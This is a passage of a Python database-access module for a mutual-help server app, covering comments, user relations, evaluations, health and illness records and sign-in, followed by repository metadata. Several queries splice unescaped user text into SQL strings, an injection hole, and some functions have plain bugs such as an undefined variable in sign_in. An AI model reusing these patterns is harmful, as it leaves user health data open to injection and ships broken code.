# trust and reputation compute here.\n #\n return True\n\n\n'''\nadd a new comment to a help event.\n@params includes event_id, represents comment belongs to which event,\n author, user's id, author of comment,\n content, content of comment.\n@return new comment id if succeed,\n -1 otherwise.\n'''\ndef add_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data:\n return -1\n if KEY.CONTENT not in data:\n return -1\n sql = \"insert into comment (event_id, author, content, time) values (%d, %d, '%s', now())\"\n try:\n comment_id = dbhelper.insert(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.CONTENT]))\n return comment_id\n except:\n return -1\n\n\n'''\nremove a comment from a help event by author him/her self.\n@params includes id, indicates author him/her self.\n event_id, indicates which event the comment belongs to.\n comment_id, indicates comment itself.\n@return True if delete successfully,\n False if fails.\n'''\ndef remove_comment(data):\n if KEY.ID not in data or KEY.EVENT_ID not in data or KEY.COMMENT_ID not in data:\n return False\n sql = \"delete from comment where id = %d and event_id = %d and author = %d\"\n try:\n dbhelper.execute(sql%(data[KEY.COMMENT_ID], data[KEY.EVENT_ID], data[KEY.ID]))\n return True\n except:\n return False\n\n\n'''\nget comments of a help event.\n@params event_id, id of the help event.\n@return a list of comments. each comment contain all detail information.\n'''\ndef get_comments(data):\n if KEY.EVENT_ID not in data:\n return None\n comment_list = []\n comment = {}\n sql = \"select id from comment where event_id = %d order by time DESC\"\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.EVENT_ID]))\n for each_result in sql_result:\n for each_id in each_result:\n comment[KEY.COMMENT_ID] = each_id\n comment = get_comment_info(comment)\n if comment is not None:\n comment_list.append(comment)\n return comment_list\n except:\n return None\n\n\n'''\nget detail information of a comment.\n@params includes comment_id, id of comment.\n@return information of comment, includes id of comment,\n event_id, indicates which event belongs to,\n author_id, author's user id,\n author, nickname of author,\n content, main body of comment,\n time, add time of comment.\n None indicates a fail query. Maybe the chosen comment doesn't exist.\n'''\ndef get_comment_info(data):\n if KEY.COMMENT_ID not in data:\n return None\n sql = \"select event_id, author, content, time from comment where id = %d\"\n comment_info = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(data[KEY.COMMENT_ID]))\n if sql_result is not None:\n comment_info = {}\n comment_info[KEY.COMMENT_ID] = data[KEY.COMMENT_ID]\n comment_info[KEY.EVENT_ID] = sql_result[0]\n comment_info[KEY.AUTHOR_ID] = sql_result[1]\n comment_info[KEY.CONTENT] = sql_result[2]\n comment_info[KEY.TIME] = str(sql_result[3])\n user = {}\n user[KEY.ID] = comment_info[KEY.AUTHOR_ID]\n user = get_user_information(user)\n if user is not None:\n comment_info[KEY.AUTHOR] = user[KEY.NICKNAME]\n except:\n pass\n finally:\n return comment_info\n\n\n'''\nadd a static relation between two users. The relation is single direction.\n@params includes two users' id, one is called id, the other called user_id.\nparameter type indicates type of static relation. two users in one direction could only have one type of relation.\n type: 0 indicates family relation.\n 1 indicates geography relation.\n 2 indicates career, interest and general friend relation.\n@return True if successfully adds.\n False otherwise.\n'''\ndef add_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.TYPE not in data:\n return False\n sql = \"replace into static_relation (user_a, user_b, type, time) values (%d, %d, %d, now())\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID], data[KEY.TYPE]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\nremove a static relation of two user.\n@params includes two users' id, one is called id, the other called user_id.\n@return True if successfully removes.\n False otherwise.\n'''\ndef remove_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data:\n return False\n sql = \"delete from static_relation where user_a = %d and user_b = %d\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ngive an evaluation to a user in a help event.\n@params includes: id, evaluater.\n user_id, evaluatee.\n event_id, indicates the help event.\n value, the value of evaluation.\n@return True if successfully evaluate.\n Flase otherwise.\n'''\ndef evaluate_user(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.VALUE not in data:\n return False\n \n value_list = ast.literal_eval(data[KEY.VALUE])\n value = 0.0\n for each_value in value_list:\n value += each_value\n list_len = len(value_list)\n if list_len == 0:\n list_len = 1\n value /= list_len\n\n sql = \"replace into evaluation (event_id, from, to, value, time) values (%d, %d, %d, %f, now())\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.USER_ID], value))\n return True\n except:\n return False\n\n\n\n'''\nadd a health record of a user into database.\n@params includes id, user's id.\n type, type of health indicator.\n value, value of some health indicator.\n@return the health record id of the new record.\n -1 indicates fail.\n'''\ndef health_record(data):\n if KEY.ID not in data or KEY.TYPE not in data or KEY.VALUE not in data:\n return -1\n sql = \"insert into health (user_id, type, value, time) values (%d, %d, %f, now())\"\n record_id = -1\n try:\n record_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE], data[KEY.VALUE]))\n except:\n record_id = -1\n finally:\n return record_id\n\n\n'''\nget details of one certain health record.\n@params includes record_id, id of the health record.\n@return details of the health record, contains record id, user id, type, certain value and record time.\n None indicates fail query.\n'''\ndef get_health_record(record_id):\n sql = \"select id, user_id, type, value, time from health where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.HEALTH_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.TYPE] = sql_result[2]\n record[KEY.VALUE] = float(sql_result[3])\n record[KEY.TIME] = str(sql_result[4])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all health records of a user, but at most 100 records.\n@params includes id, user's id.\n@return a list that contain all health records. each element is a json that contains details information of a health record.\n None indicates fail query.\n'''\ndef get_health_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from health where user_id = %d order by time DESC limit %d\"\n sql_result = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n records = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_health_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\nadd an illness record of a user into database.\n@params includes id, user's id.\n content, illness detail information.\n@return illness record id.\n -1 indicates fail.\n'''\ndef illness_record(data):\n if KEY.ID not in data or KEY.CONTENT not in data:\n return -1\n sql = \"insert into illness (user_id, content, time) values (%d, '%s', now())\"\n illness_id = -1\n try:\n illness_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.CONTENT]))\n except:\n illness_id = -1\n finally:\n return illness_id\n\n\n'''\nget details of an illness record.\n@params includes record id, indicates which record to be queried.\n@return content of an illness record, includes record's id, user's id, illness content and illness time.\n None indicates fail query or no such record.\n'''\ndef get_illness_record(record_id):\n sql = \"select id, user_id, content, time from illness where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.ILLNESS_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.CONTENT] = sql_result[2]\n record[KEY.TIME] = str(sql_result[3])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all illness records of a user, but at most 100 records.\n@params includes: id, user's id.\n@return a list that contain all illness records. each element in the list is a json that is consist of details of an illness record.\n None indicates fail query.\n'''\ndef get_illness_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from illness where user_id = %d order by time ASC limit %d\"\n sql_result = None\n records = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_illness_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\ncreate a loving bank account. It contains loving bank and credit.\n@params includes user_id, user's id, initial coin number and initial score value.\n@return new bank account id if succeed.\n -1 if fail.\n'''\ndef create_loving_bank(data, init_coin=0, init_score=0):\n if KEY.ID not in data:\n return -1\n sql = \"insert into loving_bank (user_id, coin, score, ac_score) values (%d, %d, %d, %d)\"\n try:\n bank_account_id = dbhelper.insert(sql%(data[KEY.ID], init_coin, init_score, init_score))\n return bank_account_id\n except:\n return -1\n\n\n'''\nuser could sign in once a day. Especially, if user has signed in today, this method would return false.\n@params includes user_id. user's id.\n@return True if sign in successfully.\n False otherwise.\n'''\ndef sign_in(data):\n if KEY.ID not in data:\n return False\n if is_sign_in(user_id):\n return False\n sql = \"insert into sign_in (user_id, time) values (%d, now())\"\n try:\n sign_in_id = dbhelper.insert(sql%(data[KEY.ID]))\n if sign_in_id > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ncheck whether a user has signed in today.\n@params includes user_id. user's id.\n@return True if user has signed in.\n False otherwise.\n'''\ndef is_sign_in(user_id):\n result = False\n sql = \"select count(*) from sign_in where user_id = %d and to_days(time) = to_days(now())\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(user_id))[0]\n if sql_result > 0:\n result = True\n else:\n result = False\n except:\n result = False\n finally:\n return result\n\n\n", "repo_name": "hs-TA/ehelp_server", "sub_path": "database/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 25742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.KEY.ACCOUNT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 49, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 52, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 69, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 75, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 75, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 78, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 83, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 84, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 84, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY.GENDER", "line_number": 92, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 92, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 95, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY.AGE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 100, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 103, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY.PHONE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 108, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY.LOCATION", "line_number": 116, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 116, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 117, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 117, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 117, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 120, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 125, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 128, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 135, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 135, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 138, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 143, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 146, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 161, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 161, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 165, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY.SALT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 188, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.SALT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 195, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 195, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 197, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 197, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 211, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 211, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 211, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 215, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 231, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 231, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 235, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 240, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 241, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 241, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 242, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 242, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 243, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 243, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 246, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 246, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 247, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 247, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 250, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 251, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 252, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 252, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 270, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 275, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 294, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 294, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 295, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 295, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 298, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 303, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 306, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATE", "line_number": 311, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 311, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 312, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 312, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 313, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 316, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 332, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 336, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 350, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 350, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 355, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 355, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 358, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 358, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 360, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 362, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 364, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 364, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.KEY.FOLLOW_NUMBER", "line_number": 366, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 366, "usage_type": "name"}, {"api_name": "utils.KEY.SUPPORT_NUMBER", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.KEY.GROUP_PTS", "line_number": 368, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 368, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 370, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY.LAUNCHER", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 391, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 391, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 407, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 407, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 409, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 409, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 410, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 410, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 411, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 411, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 412, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 413, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 413, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 414, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 415, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 417, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 417, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 433, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 433, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 435, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 435, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 436, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 436, "usage_type": "name"}, {"api_name": 